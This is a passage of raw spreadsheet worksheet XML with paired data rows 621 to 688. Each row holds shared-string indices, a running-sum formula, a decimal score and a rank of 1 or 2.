        <v>1201</v>
      </c>
      <c r="C621">
        <f t="shared" si="9"/>
        <v>10207048</v>
      </c>
      <c r="D621" t="s">
        <v>1203</v>
      </c>
      <c r="E621">
        <v>2.886848926544189</v>
      </c>
      <c r="F621">
        <v>2</v>
      </c>
    </row>
    <row r="622" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A622" t="s">
        <v>1204</v>
      </c>
      <c r="B622" t="s">
        <v>1205</v>
      </c>
      <c r="C622">
        <f t="shared" si="9"/>
        <v>10208301</v>
      </c>
      <c r="D622" t="s">
        <v>1206</v>
      </c>
      <c r="E622">
        <v>35.967582702636719</v>
      </c>
      <c r="F622">
        <v>1</v>
      </c>
    </row>
    <row r="623" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A623" t="s">
        <v>1204</v>
      </c>
      <c r="B623" t="s">
        <v>1205</v>
      </c>
      <c r="C623">
        <f t="shared" si="9"/>
        <v>10209554</v>
      </c>
      <c r="D623" t="s">
        <v>1207</v>
      </c>
      <c r="E623">
        <v>0.36763820052146912</v>
      </c>
      <c r="F623">
        <v>2</v>
      </c>
    </row>
    <row r="624" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A624" t="s">
        <v>1208</v>
      </c>
      <c r="B624" t="s">
        <v>1209</v>
      </c>
      <c r="C624">
        <f t="shared" si="9"/>
        <v>10210807</v>
      </c>
      <c r="D624" t="s">
        <v>1210</v>
      </c>
      <c r="E624">
        <v>25.22893142700195</v>
      </c>
      <c r="F624">
        <v>1</v>
      </c>
    </row>
    <row r="625" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A625" t="s">
        <v>1208</v>
      </c>
      <c r="B625" t="s">
        <v>1209</v>
      </c>
      <c r="C625">
        <f t="shared" si="9"/>
        <v>10212060</v>
      </c>
      <c r="D625" t="s">
        <v>1211</v>
      </c>
      <c r="E625">
        <v>4.6317400932312012</v>
      </c>
      <c r="F625">
        <v>2</v>
      </c>
    </row>
    <row r="626" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A626" t="s">
        <v>1212</v>
      </c>
      <c r="B626" t="s">
        <v>1213</v>
      </c>
      <c r="C626">
        <f t="shared" si="9"/>
        <v>10213313</v>
      </c>
      <c r="D626" t="s">
        <v>1214</v>
      </c>
      <c r="E626">
        <v>23.02053070068359</v>
      </c>
      <c r="F626">
        <v>1</v>
      </c>
    </row>
    <row r="627" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A627" t="s">
        <v>1212</v>
      </c>
      <c r="B627" t="s">
        <v>1213</v>
      </c>
      <c r="C627">
        <f t="shared" si="9"/>
        <v>10214566</v>
      </c>
      <c r="D627" t="s">
        <v>1215</v>
      </c>
      <c r="E627">
        <v>12.52172183990479</v>
      </c>
      <c r="F627">
        <v>2</v>
      </c>
    </row>
    <row r="628" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A628" t="s">
        <v>1216</v>
      </c>
      <c r="B628" t="s">
        <v>1217</v>
      </c>
      <c r="C628">
        <f t="shared" si="9"/>
        <v>10215819</v>
      </c>
      <c r="D628" t="s">
        <v>1218</v>
      </c>
      <c r="E628">
        <v>27.012430191040039</v>
      </c>
      <c r="F628">
        <v>1</v>
      </c>
    </row>
    <row r="629" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A629" t="s">
        <v>1216</v>
      </c>
      <c r="B629" t="s">
        <v>1217</v>
      </c>
      <c r="C629">
        <f t="shared" si="9"/>
        <v>10217072</v>
      </c>
      <c r="D629" t="s">
        <v>1219</v>
      </c>
      <c r="E629">
        <v>16.20146369934082</v>
      </c>
      <c r="F629">
        <v>2</v>
      </c>
    </row>
    <row r="630" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A630" t="s">
        <v>1220</v>
      </c>
      <c r="B630" t="s">
        <v>1221</v>
      </c>
      <c r="C630">
        <f t="shared" si="9"/>
        <v>10218325</v>
      </c>
      <c r="D630" t="s">
        <v>1222</v>
      </c>
      <c r="E630">
        <v>23.49541091918945</v>
      </c>
      <c r="F630">
        <v>1</v>
      </c>
    </row>
    <row r="631" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A631" t="s">
        <v>1220</v>
      </c>
      <c r="B631" t="s">
        <v>1221</v>
      </c>
      <c r="C631">
        <f t="shared" si="9"/>
        <v>10219578</v>
      </c>
      <c r="D631" t="s">
        <v>1223</v>
      </c>
      <c r="E631">
        <v>3.1578633785247798</v>
      </c>
      <c r="F631">
        <v>2</v>
      </c>
    </row>
    <row r="632" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A632" t="s">
        <v>1224</v>
      </c>
      <c r="B632" t="s">
        <v>1225</v>
      </c>
      <c r="C632">
        <f t="shared" si="9"/>
        <v>10220831</v>
      </c>
      <c r="D632" t="s">
        <v>226</v>
      </c>
      <c r="E632">
        <v>33.891223907470703</v>
      </c>
      <c r="F632">
        <v>1</v>
      </c>
    </row>
    <row r="633" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A633" t="s">
        <v>1224</v>
      </c>
      <c r="B633" t="s">
        <v>1225</v>
      </c>
      <c r="C633">
        <f t="shared" si="9"/>
        <v>10222084</v>
      </c>
      <c r="D633" t="s">
        <v>1226</v>
      </c>
      <c r="E633">
        <v>3.0387032777070999E-2</v>
      </c>
      <c r="F633">
        <v>2</v>
      </c>
    </row>
    <row r="634" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A634" t="s">
        <v>1227</v>
      </c>
      <c r="B634" t="s">
        <v>1228</v>
      </c>
      <c r="C634">
        <f t="shared" si="9"/>
        <v>10223337</v>
      </c>
      <c r="D634" t="s">
        <v>1186</v>
      </c>
      <c r="E634">
        <v>27.603672027587891</v>
      </c>
      <c r="F634">
        <v>1</v>
      </c>
    </row>
    <row r="635" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A635" t="s">
        <v>1227</v>
      </c>
      <c r="B635" t="s">
        <v>1228</v>
      </c>
      <c r="C635">
        <f t="shared" si="9"/>
        <v>10224590</v>
      </c>
      <c r="D635" t="s">
        <v>1229</v>
      </c>
      <c r="E635">
        <v>2.647651731967926E-2</v>
      </c>
      <c r="F635">
        <v>2</v>
      </c>
    </row>
    <row r="636" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A636" t="s">
        <v>1230</v>
      </c>
      <c r="B636" t="s">
        <v>1231</v>
      </c>
      <c r="C636">
        <f t="shared" si="9"/>
        <v>10225843</v>
      </c>
      <c r="D636" t="s">
        <v>1232</v>
      </c>
      <c r="E636">
        <v>33.286792755126953</v>
      </c>
      <c r="F636">
        <v>1</v>
      </c>
    </row>
    <row r="637" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A637" t="s">
        <v>1230</v>
      </c>
      <c r="B637" t="s">
        <v>1231</v>
      </c>
      <c r="C637">
        <f t="shared" si="9"/>
        <v>10227096</v>
      </c>
      <c r="D637" t="s">
        <v>1233</v>
      </c>
      <c r="E637">
        <v>4.954827090841718E-5</v>
      </c>
      <c r="F637">
        <v>2</v>
      </c>
    </row>
    <row r="638" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A638" t="s">
        <v>1234</v>
      </c>
      <c r="B638" t="s">
        <v>1235</v>
      </c>
      <c r="C638">
        <f t="shared" si="9"/>
        <v>10228349</v>
      </c>
      <c r="D638" t="s">
        <v>1236</v>
      </c>
      <c r="E638">
        <v>38.601089477539063</v>
      </c>
      <c r="F638">
        <v>1</v>
      </c>
    </row>
    <row r="639" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A639" t="s">
        <v>1234</v>
      </c>
      <c r="B639" t="s">
        <v>1235</v>
      </c>
      <c r="C639">
        <f t="shared" si="9"/>
        <v>10229602</v>
      </c>
      <c r="D639" t="s">
        <v>1237</v>
      </c>
      <c r="E639">
        <v>8.5998897552490234</v>
      </c>
      <c r="F639">
        <v>2</v>
      </c>
    </row>
    <row r="640" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A640" t="s">
        <v>1238</v>
      </c>
      <c r="B640" t="s">
        <v>1239</v>
      </c>
      <c r="C640">
        <f t="shared" si="9"/>
        <v>10230855</v>
      </c>
      <c r="D640" t="s">
        <v>1240</v>
      </c>
      <c r="E640">
        <v>25.196964263916019</v>
      </c>
      <c r="F640">
        <v>1</v>
      </c>
    </row>
    <row r="641" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A641" t="s">
        <v>1238</v>
      </c>
      <c r="B641" t="s">
        <v>1239</v>
      </c>
      <c r="C641">
        <f t="shared" si="9"/>
        <v>10232108</v>
      </c>
      <c r="D641" t="s">
        <v>1241</v>
      </c>
      <c r="E641">
        <v>10.47131252288818</v>
      </c>
      <c r="F641">
        <v>2</v>
      </c>
    </row>
    <row r="642" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A642" t="s">
        <v>1242</v>
      </c>
      <c r="B642" t="s">
        <v>1064</v>
      </c>
      <c r="C642">
        <f t="shared" si="9"/>
        <v>10233361</v>
      </c>
      <c r="D642" t="s">
        <v>1065</v>
      </c>
      <c r="E642">
        <v>23.32436370849609</v>
      </c>
      <c r="F642">
        <v>1</v>
      </c>
    </row>
    <row r="643" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A643" t="s">
        <v>1242</v>
      </c>
      <c r="B643" t="s">
        <v>1064</v>
      </c>
      <c r="C643">
        <f t="shared" si="9"/>
        <v>10234614</v>
      </c>
      <c r="D643" t="s">
        <v>1243</v>
      </c>
      <c r="E643">
        <v>8.0775651931762695</v>
      </c>
      <c r="F643">
        <v>2</v>
      </c>
    </row>
    <row r="644" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A644" t="s">
        <v>1244</v>
      </c>
      <c r="B644" t="s">
        <v>1245</v>
      </c>
      <c r="C644">
        <f t="shared" si="9"/>
        <v>10235867</v>
      </c>
      <c r="D644" t="s">
        <v>1246</v>
      </c>
      <c r="E644">
        <v>26.950407028198239</v>
      </c>
      <c r="F644">
        <v>1</v>
      </c>
    </row>
    <row r="645" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A645" t="s">
        <v>1244</v>
      </c>
      <c r="B645" t="s">
        <v>1245</v>
      </c>
      <c r="C645">
        <f t="shared" si="9"/>
        <v>10237120</v>
      </c>
      <c r="D645" t="s">
        <v>1247</v>
      </c>
      <c r="E645">
        <v>6.7546696662902832</v>
      </c>
      <c r="F645">
        <v>2</v>
      </c>
    </row>
    <row r="646" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A646" t="s">
        <v>1248</v>
      </c>
      <c r="B646" t="s">
        <v>1249</v>
      </c>
      <c r="C646">
        <f t="shared" si="9"/>
        <v>10238373</v>
      </c>
      <c r="D646" t="s">
        <v>1250</v>
      </c>
      <c r="E646">
        <v>21.703981399536129</v>
      </c>
      <c r="F646">
        <v>1</v>
      </c>
    </row>
    <row r="647" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A647" t="s">
        <v>1248</v>
      </c>
      <c r="B647" t="s">
        <v>1249</v>
      </c>
      <c r="C647">
        <f t="shared" si="9"/>
        <v>10239626</v>
      </c>
      <c r="D647" t="s">
        <v>1251</v>
      </c>
      <c r="E647">
        <v>0.36960142850875849</v>
      </c>
      <c r="F647">
        <v>2</v>
      </c>
    </row>
    <row r="648" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A648" t="s">
        <v>1252</v>
      </c>
      <c r="B648" t="s">
        <v>1253</v>
      </c>
      <c r="C648">
        <f t="shared" si="9"/>
        <v>10240879</v>
      </c>
      <c r="D648" t="s">
        <v>1254</v>
      </c>
      <c r="E648">
        <v>33.863445281982422</v>
      </c>
      <c r="F648">
        <v>1</v>
      </c>
    </row>
    <row r="649" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A649" t="s">
        <v>1252</v>
      </c>
      <c r="B649" t="s">
        <v>1253</v>
      </c>
      <c r="C649">
        <f t="shared" si="9"/>
        <v>10242132</v>
      </c>
      <c r="D649" t="s">
        <v>1255</v>
      </c>
      <c r="E649">
        <v>9.0120258331298828</v>
      </c>
      <c r="F649">
        <v>2</v>
      </c>
    </row>
    <row r="650" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A650" t="s">
        <v>1256</v>
      </c>
      <c r="B650" t="s">
        <v>1257</v>
      </c>
      <c r="C650">
        <f t="shared" ref="C650:C713" si="10">C649+1253</f>
        <v>10243385</v>
      </c>
      <c r="D650" t="s">
        <v>1258</v>
      </c>
      <c r="E650">
        <v>27.225404739379879</v>
      </c>
      <c r="F650">
        <v>1</v>
      </c>
    </row>
    <row r="651" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A651" t="s">
        <v>1256</v>
      </c>
      <c r="B651" t="s">
        <v>1257</v>
      </c>
      <c r="C651">
        <f t="shared" si="10"/>
        <v>10244638</v>
      </c>
      <c r="D651" t="s">
        <v>1259</v>
      </c>
      <c r="E651">
        <v>2.8563623428344731</v>
      </c>
      <c r="F651">
        <v>2</v>
      </c>
    </row>
    <row r="652" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A652" t="s">
        <v>1260</v>
      </c>
      <c r="B652" t="s">
        <v>1261</v>
      </c>
      <c r="C652">
        <f t="shared" si="10"/>
        <v>10245891</v>
      </c>
      <c r="D652" t="s">
        <v>1262</v>
      </c>
      <c r="E652">
        <v>18.635406494140621</v>
      </c>
      <c r="F652">
        <v>1</v>
      </c>
    </row>
    <row r="653" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A653" t="s">
        <v>1260</v>
      </c>
      <c r="B653" t="s">
        <v>1261</v>
      </c>
      <c r="C653">
        <f t="shared" si="10"/>
        <v>10247144</v>
      </c>
      <c r="D653" t="s">
        <v>1263</v>
      </c>
      <c r="E653">
        <v>16.73165321350098</v>
      </c>
      <c r="F653">
        <v>2</v>
      </c>
    </row>
    <row r="654" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A654" t="s">
        <v>1264</v>
      </c>
      <c r="B654" t="s">
        <v>1265</v>
      </c>
      <c r="C654">
        <f t="shared" si="10"/>
        <v>10248397</v>
      </c>
      <c r="D654" t="s">
        <v>1236</v>
      </c>
      <c r="E654">
        <v>37.776275634765618</v>
      </c>
      <c r="F654">
        <v>1</v>
      </c>
    </row>
    <row r="655" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A655" t="s">
        <v>1264</v>
      </c>
      <c r="B655" t="s">
        <v>1265</v>
      </c>
      <c r="C655">
        <f t="shared" si="10"/>
        <v>10249650</v>
      </c>
      <c r="D655" t="s">
        <v>1266</v>
      </c>
      <c r="E655">
        <v>4.5314087867736816</v>
      </c>
      <c r="F655">
        <v>2</v>
      </c>
    </row>
    <row r="656" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A656" t="s">
        <v>1267</v>
      </c>
      <c r="B656" t="s">
        <v>1268</v>
      </c>
      <c r="C656">
        <f t="shared" si="10"/>
        <v>10250903</v>
      </c>
      <c r="D656" t="s">
        <v>1269</v>
      </c>
      <c r="E656">
        <v>34.474407196044922</v>
      </c>
      <c r="F656">
        <v>1</v>
      </c>
    </row>
    <row r="657" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A657" t="s">
        <v>1267</v>
      </c>
      <c r="B657" t="s">
        <v>1268</v>
      </c>
      <c r="C657">
        <f t="shared" si="10"/>
        <v>10252156</v>
      </c>
      <c r="D657" t="s">
        <v>1270</v>
      </c>
      <c r="E657">
        <v>7.3104648590087891</v>
      </c>
      <c r="F657">
        <v>2</v>
      </c>
    </row>
    <row r="658" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A658" t="s">
        <v>1271</v>
      </c>
      <c r="B658" t="s">
        <v>1272</v>
      </c>
      <c r="C658">
        <f t="shared" si="10"/>
        <v>10253409</v>
      </c>
      <c r="D658" t="s">
        <v>1273</v>
      </c>
      <c r="E658">
        <v>34.266433715820313</v>
      </c>
      <c r="F658">
        <v>1</v>
      </c>
    </row>
    <row r="659" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A659" t="s">
        <v>1271</v>
      </c>
      <c r="B659" t="s">
        <v>1272</v>
      </c>
      <c r="C659">
        <f t="shared" si="10"/>
        <v>10254662</v>
      </c>
      <c r="D659" t="s">
        <v>1274</v>
      </c>
      <c r="E659">
        <v>10.092367172241209</v>
      </c>
      <c r="F659">
        <v>2</v>
      </c>
    </row>
    <row r="660" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A660" t="s">
        <v>1275</v>
      </c>
      <c r="B660" t="s">
        <v>1276</v>
      </c>
      <c r="C660">
        <f t="shared" si="10"/>
        <v>10255915</v>
      </c>
      <c r="D660" t="s">
        <v>1277</v>
      </c>
      <c r="E660">
        <v>30.45964241027832</v>
      </c>
      <c r="F660">
        <v>1</v>
      </c>
    </row>
    <row r="661" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A661" t="s">
        <v>1275</v>
      </c>
      <c r="B661" t="s">
        <v>1276</v>
      </c>
      <c r="C661">
        <f t="shared" si="10"/>
        <v>10257168</v>
      </c>
      <c r="D661" t="s">
        <v>1278</v>
      </c>
      <c r="E661">
        <v>4.199303150177002</v>
      </c>
      <c r="F661">
        <v>2</v>
      </c>
    </row>
    <row r="662" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A662" t="s">
        <v>1279</v>
      </c>
      <c r="B662" t="s">
        <v>1280</v>
      </c>
      <c r="C662">
        <f t="shared" si="10"/>
        <v>10258421</v>
      </c>
      <c r="D662" t="s">
        <v>218</v>
      </c>
      <c r="E662">
        <v>26.643711090087891</v>
      </c>
      <c r="F662">
        <v>1</v>
      </c>
    </row>
    <row r="663" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A663" t="s">
        <v>1279</v>
      </c>
      <c r="B663" t="s">
        <v>1280</v>
      </c>
      <c r="C663">
        <f t="shared" si="10"/>
        <v>10259674</v>
      </c>
      <c r="D663" t="s">
        <v>1281</v>
      </c>
      <c r="E663">
        <v>11.2692813873291</v>
      </c>
      <c r="F663">
        <v>2</v>
      </c>
    </row>
    <row r="664" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A664" t="s">
        <v>1282</v>
      </c>
      <c r="B664" t="s">
        <v>1283</v>
      </c>
      <c r="C664">
        <f t="shared" si="10"/>
        <v>10260927</v>
      </c>
      <c r="D664" t="s">
        <v>1284</v>
      </c>
      <c r="E664">
        <v>37.576675415039063</v>
      </c>
      <c r="F664">
        <v>1</v>
      </c>
    </row>
    <row r="665" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A665" t="s">
        <v>1282</v>
      </c>
      <c r="B665" t="s">
        <v>1283</v>
      </c>
      <c r="C665">
        <f t="shared" si="10"/>
        <v>10262180</v>
      </c>
      <c r="D665" t="s">
        <v>1285</v>
      </c>
      <c r="E665">
        <v>10.043399810791019</v>
      </c>
      <c r="F665">
        <v>2</v>
      </c>
    </row>
    <row r="666" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A666" t="s">
        <v>1286</v>
      </c>
      <c r="B666" t="s">
        <v>1213</v>
      </c>
      <c r="C666">
        <f t="shared" si="10"/>
        <v>10263433</v>
      </c>
      <c r="D666" t="s">
        <v>1214</v>
      </c>
      <c r="E666">
        <v>23.192655563354489</v>
      </c>
      <c r="F666">
        <v>1</v>
      </c>
    </row>
    <row r="667" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A667" t="s">
        <v>1286</v>
      </c>
      <c r="B667" t="s">
        <v>1213</v>
      </c>
      <c r="C667">
        <f t="shared" si="10"/>
        <v>10264686</v>
      </c>
      <c r="D667" t="s">
        <v>1287</v>
      </c>
      <c r="E667">
        <v>12.046684265136721</v>
      </c>
      <c r="F667">
        <v>2</v>
      </c>
    </row>
    <row r="668" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A668" t="s">
        <v>1288</v>
      </c>
      <c r="B668" t="s">
        <v>1289</v>
      </c>
      <c r="C668">
        <f t="shared" si="10"/>
        <v>10265939</v>
      </c>
      <c r="D668" t="s">
        <v>1290</v>
      </c>
      <c r="E668">
        <v>23.59598350524902</v>
      </c>
      <c r="F668">
        <v>1</v>
      </c>
    </row>
    <row r="669" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A669" t="s">
        <v>1288</v>
      </c>
      <c r="B669" t="s">
        <v>1289</v>
      </c>
      <c r="C669">
        <f t="shared" si="10"/>
        <v>10267192</v>
      </c>
      <c r="D669" t="s">
        <v>1291</v>
      </c>
      <c r="E669">
        <v>0.3920043408870697</v>
      </c>
      <c r="F669">
        <v>2</v>
      </c>
    </row>
    <row r="670" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A670" t="s">
        <v>1292</v>
      </c>
      <c r="B670" t="s">
        <v>1293</v>
      </c>
      <c r="C670">
        <f t="shared" si="10"/>
        <v>10268445</v>
      </c>
      <c r="D670" t="s">
        <v>1294</v>
      </c>
      <c r="E670">
        <v>31.53664398193359</v>
      </c>
      <c r="F670">
        <v>1</v>
      </c>
    </row>
    <row r="671" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A671" t="s">
        <v>1292</v>
      </c>
      <c r="B671" t="s">
        <v>1293</v>
      </c>
      <c r="C671">
        <f t="shared" si="10"/>
        <v>10269698</v>
      </c>
      <c r="D671" t="s">
        <v>1295</v>
      </c>
      <c r="E671">
        <v>3.1864700317382808</v>
      </c>
      <c r="F671">
        <v>2</v>
      </c>
    </row>
    <row r="672" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A672" t="s">
        <v>1296</v>
      </c>
      <c r="B672" t="s">
        <v>1297</v>
      </c>
      <c r="C672">
        <f t="shared" si="10"/>
        <v>10270951</v>
      </c>
      <c r="D672" t="s">
        <v>1298</v>
      </c>
      <c r="E672">
        <v>27.150299072265621</v>
      </c>
      <c r="F672">
        <v>1</v>
      </c>
    </row>
    <row r="673" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A673" t="s">
        <v>1296</v>
      </c>
      <c r="B673" t="s">
        <v>1297</v>
      </c>
      <c r="C673">
        <f t="shared" si="10"/>
        <v>10272204</v>
      </c>
      <c r="D673" t="s">
        <v>1299</v>
      </c>
      <c r="E673">
        <v>11.68883037567139</v>
      </c>
      <c r="F673">
        <v>2</v>
      </c>
    </row>
    <row r="674" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A674" t="s">
        <v>1300</v>
      </c>
      <c r="B674" t="s">
        <v>1301</v>
      </c>
      <c r="C674">
        <f t="shared" si="10"/>
        <v>10273457</v>
      </c>
      <c r="D674" t="s">
        <v>1302</v>
      </c>
      <c r="E674">
        <v>26.172149658203121</v>
      </c>
      <c r="F674">
        <v>1</v>
      </c>
    </row>
    <row r="675" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A675" t="s">
        <v>1300</v>
      </c>
      <c r="B675" t="s">
        <v>1301</v>
      </c>
      <c r="C675">
        <f t="shared" si="10"/>
        <v>10274710</v>
      </c>
      <c r="D675" t="s">
        <v>1303</v>
      </c>
      <c r="E675">
        <v>15.510551452636721</v>
      </c>
      <c r="F675">
        <v>2</v>
      </c>
    </row>
    <row r="676" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A676" t="s">
        <v>1304</v>
      </c>
      <c r="B676" t="s">
        <v>1245</v>
      </c>
      <c r="C676">
        <f t="shared" si="10"/>
        <v>10275963</v>
      </c>
      <c r="D676" t="s">
        <v>1246</v>
      </c>
      <c r="E676">
        <v>26.9722785949707</v>
      </c>
      <c r="F676">
        <v>1</v>
      </c>
    </row>
    <row r="677" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A677" t="s">
        <v>1304</v>
      </c>
      <c r="B677" t="s">
        <v>1245</v>
      </c>
      <c r="C677">
        <f t="shared" si="10"/>
        <v>10277216</v>
      </c>
      <c r="D677" t="s">
        <v>1305</v>
      </c>
      <c r="E677">
        <v>4.520756721496582</v>
      </c>
      <c r="F677">
        <v>2</v>
      </c>
    </row>
    <row r="678" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A678" t="s">
        <v>1306</v>
      </c>
      <c r="B678" t="s">
        <v>1307</v>
      </c>
      <c r="C678">
        <f t="shared" si="10"/>
        <v>10278469</v>
      </c>
      <c r="D678" t="s">
        <v>1308</v>
      </c>
      <c r="E678">
        <v>29.414493560791019</v>
      </c>
      <c r="F678">
        <v>1</v>
      </c>
    </row>
    <row r="679" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A679" t="s">
        <v>1306</v>
      </c>
      <c r="B679" t="s">
        <v>1307</v>
      </c>
      <c r="C679">
        <f t="shared" si="10"/>
        <v>10279722</v>
      </c>
      <c r="D679" t="s">
        <v>1309</v>
      </c>
      <c r="E679">
        <v>0.38223820924758911</v>
      </c>
      <c r="F679">
        <v>2</v>
      </c>
    </row>
    <row r="680" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A680" t="s">
        <v>1310</v>
      </c>
      <c r="B680" t="s">
        <v>1311</v>
      </c>
      <c r="C680">
        <f t="shared" si="10"/>
        <v>10280975</v>
      </c>
      <c r="D680" t="s">
        <v>1312</v>
      </c>
      <c r="E680">
        <v>25.56717681884766</v>
      </c>
      <c r="F680">
        <v>1</v>
      </c>
    </row>
    <row r="681" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A681" t="s">
        <v>1310</v>
      </c>
      <c r="B681" t="s">
        <v>1311</v>
      </c>
      <c r="C681">
        <f t="shared" si="10"/>
        <v>10282228</v>
      </c>
      <c r="D681" t="s">
        <v>1313</v>
      </c>
      <c r="E681">
        <v>0.11895224452018741</v>
      </c>
      <c r="F681">
        <v>2</v>
      </c>
    </row>
    <row r="682" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A682" t="s">
        <v>1314</v>
      </c>
      <c r="B682" t="s">
        <v>1315</v>
      </c>
      <c r="C682">
        <f t="shared" si="10"/>
        <v>10283481</v>
      </c>
      <c r="D682" t="s">
        <v>1316</v>
      </c>
      <c r="E682">
        <v>21.760379791259769</v>
      </c>
      <c r="F682">
        <v>1</v>
      </c>
    </row>
    <row r="683" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A683" t="s">
        <v>1314</v>
      </c>
      <c r="B683" t="s">
        <v>1315</v>
      </c>
      <c r="C683">
        <f t="shared" si="10"/>
        <v>10284734</v>
      </c>
      <c r="D683" t="s">
        <v>1317</v>
      </c>
      <c r="E683">
        <v>5.2004132270812988</v>
      </c>
      <c r="F683">
        <v>2</v>
      </c>
    </row>
    <row r="684" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A684" t="s">
        <v>1318</v>
      </c>
      <c r="B684" t="s">
        <v>1319</v>
      </c>
      <c r="C684">
        <f t="shared" si="10"/>
        <v>10285987</v>
      </c>
      <c r="D684" t="s">
        <v>1236</v>
      </c>
      <c r="E684">
        <v>26.1979866027832</v>
      </c>
      <c r="F684">
        <v>1</v>
      </c>
    </row>
    <row r="685" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A685" t="s">
        <v>1318</v>
      </c>
      <c r="B685" t="s">
        <v>1319</v>
      </c>
      <c r="C685">
        <f t="shared" si="10"/>
        <v>10287240</v>
      </c>
      <c r="D685" t="s">
        <v>1320</v>
      </c>
      <c r="E685">
        <v>7.1420621871948242</v>
      </c>
      <c r="F685">
        <v>2</v>
      </c>
    </row>
    <row r="686" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A686" t="s">
        <v>1321</v>
      </c>
      <c r="B686" t="s">
        <v>1322</v>
      </c>
      <c r="C686">
        <f t="shared" si="10"/>
        <v>10288493</v>
      </c>
      <c r="D686" t="s">
        <v>1323</v>
      </c>
      <c r="E686">
        <v>29.89875411987305</v>
      </c>
      <c r="F686">
        <v>1</v>
      </c>
    </row>
    <row r="687" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A687" t="s">
        <v>1321</v>
      </c>
      <c r="B687" t="s">
        <v>1322</v>
      </c>
      <c r="C687">
        <f t="shared" si="10"/>
        <v>10289746</v>
      </c>
      <c r="D687" t="s">
        <v>1324</v>
      </c>
      <c r="E687">
        <v>2.9473545551300049</v>
      </c>
      <c r="F687">
        <v>2</v>
      </c>
    </row>
    <row r="688" spans="1:6" ht="15" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A688" t="s">
        <v>1325</v>
      </c>
      <c r="B688" t="s">
        <v>1326</v>
      </c>
